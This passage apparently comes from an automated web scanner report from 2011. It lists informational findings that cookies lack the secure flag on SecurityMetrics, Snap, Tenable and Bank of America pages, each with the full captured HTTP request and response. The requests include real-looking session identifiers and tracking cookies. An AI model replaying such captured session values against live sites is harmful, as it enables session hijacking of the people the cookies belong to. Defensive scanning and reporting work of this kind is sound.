Response

HTTP/1.1 200 OK
Set-Cookie: smsid=09f0146dbd92e08e1aac412eff15ddf24e6644aa; Path=/
Date: Tue, 26 Apr 2011 00:53:04 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 13228

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>SecurityMe
...[SNIP]...

9.16. https://securitymetrics.com/sm/determinesaq/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /sm/determinesaq/ HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/sm/determinesaq/storechd
Cache-Control: max-age=0
Origin: https://securitymetrics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4
Content-Length: 25

page=storechd&storechd=no

Response

HTTP/1.1 303 See Other
Content-Type: text/html
Location: https://securitymetrics.com/sm/determinesaq/terminaltype
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Content-Length: 0
Date: Tue, 26 Apr 2011 01:08:47 GMT
Server: SecurityMetrics/3.37.1j


9.17. https://securitymetrics.com/sm/determinesaq/reset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/reset

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sm/determinesaq/reset?resellerid= HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/pricelist.adp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 303 See Other
Content-Type: text/html
Location: https://securitymetrics.com/sm/determinesaq/storechd
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Content-Length: 0
Date: Tue, 26 Apr 2011 01:08:31 GMT
Server: SecurityMetrics/3.37.1j


9.18. https://securitymetrics.com/sm/determinesaq/storechd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/storechd

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sm/determinesaq/storechd HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/pricelist.adp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Date: Tue, 26 Apr 2011 01:08:33 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 8168


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Deter
...[SNIP]...

9.19. https://securitymetrics.com/sm/determinesaq/terminaltype  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/terminaltype

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sm/determinesaq/terminaltype HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/sm/determinesaq/storechd
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Date: Tue, 26 Apr 2011 01:08:49 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 12217


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Deter
...[SNIP]...

9.20. https://shots-s.snap.com/snap_shots.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shots-s.snap.com
Path:   /snap_shots.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /snap_shots.js HTTP/1.1
Host: shots-s.snap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:41:03 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 12:41:02 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D79c217d6eb6567f7d5135b117ad582b9%26exp%3D1366807263%26v%3D2; expires=Wed, 24-Apr-2013 12:41:03 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D79c217d6eb6567f7d5135b117ad582b9%26exp%3D1366807263%26v%3D2%26origin%3Dshots; expires=Wed, 24-Apr-2013 12:41:03 GMT; path=/; domain=.snap.com
Content-Length: 15193
Cache-Control: max-age=7200
Expires: Tue, 26 Apr 2011 14:41:03 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

//<!--
/*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved.
* Your use of this code is subject to the Snap Shots Terms of Service
* located at https://account.snap
...[SNIP]...

9.21. https://store.tenable.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?main_page=product_info&cPath=5&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:39 GMT
Server: Apache
Set-Cookie: zenid=7fb8442f26d1db353ad8306c5db292f6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 28503

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - $3,600.00 : Tenable Store, Unified Security Monitoring</title>
<meta
...[SNIP]...

9.22. https://support.tenable.com/support-center/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.tenable.com
Path:   /support-center/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support-center/ HTTP/1.1
Host: support.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:49:35 GMT
Server: Apache
Set-Cookie: CerberusPublicGUI=9f3i1skvvnpph1et7uucrkbep2; path=/; domain=support.tenable.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19773

<!doctype html>
<html lang="en">
<head>
   <title>Tenable Customer Support Portal</title>
   <meta http-equiv="content-type" content="text/html; charset=utf-8">
<link rel="stylesheet" href="cerbe
...[SNIP]...

9.23. https://tc.bankofamerica.com/c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://tc.bankofamerica.com
Path:   /c

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c HTTP/1.1
Host: tc.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; state=MA; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; hp_beta=B; cmTPSet=Y; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; throttle_value=35;

Response

HTTP/1.1 400 Bad Request
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 26 Apr 2011 12:45:45 GMT
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 139
Last-Modified: Tue, 26 Apr 2011 12:45:45 GMT
Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Tue, 26-Apr-11 16:45:45 GMT;path=/;domain=bankofamerica.com

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>No siteID in request</P>
   </BODY>
</HTML>

9.24. https://www.bankofamerica.com/Control.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Control.do?body=where_passcode_popup HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:47:04 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000F4yK4l84__JtyAFjxBtSMXQ:12rfueih8; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description
...[SNIP]...

9.25. https://www.bankofamerica.com/ProcessUser.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /ProcessUser.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ProcessUser.do?section=onlinebanking_enroll&adlink=000309029q890000g161 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; JSESSIONID=0000IQncNGlie79He7SZqIjFdOC:15bvh5047; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:47 GMT
Content-length: 0
Content-type: text/html
Location: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
Content-language: en-US
Set-cookie: JSESSIONID=0000Lh6TRorO-NKY7teHECejE7Y:12qtmh5cl; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Tue, 03 May 2011 12:23:47 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"


9.26. https://www.bankofamerica.com/deposits/cds-iras.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /deposits/cds-iras.go

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deposits/cds-iras.go?request_locale=en_US HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:49:46 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000WiNAyOMxZusl2j9h3aZNboI:15emvp2j0; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 53792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...

9.27. https://www.bankofamerica.com/deposits/checking-accounts.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /deposits/checking-accounts.go

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deposits/checking-accounts.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:48:28 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000Ns7qzV67h5K_rR84M2jM6vq:15emvp2j0; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 57115


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...

9.28. https://www.bankofamerica.com/deposits/savings-accounts.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /deposits/savings-accounts.go

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deposits/savings-accounts.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:49:44 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000bOFCpk8nTt8aoF-IeAOnvoo:15emvorhf; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 60652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...

9.29. https://www.bankofamerica.com/deposits/special-programs/add-it-up.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /deposits/special-programs/add-it-up.go

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deposits/special-programs/add-it-up.go?request_locale=en_US HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:49:46 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000ti0PA0mGuPOKot4gZ7LWh8g:15emvp2j0; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 44436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...

9.30. https://www.bankofamerica.com/deposits/special-programs/keep-the-change.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /deposits/special-programs/keep-the-change.go

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deposits/special-programs/keep-the-change.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
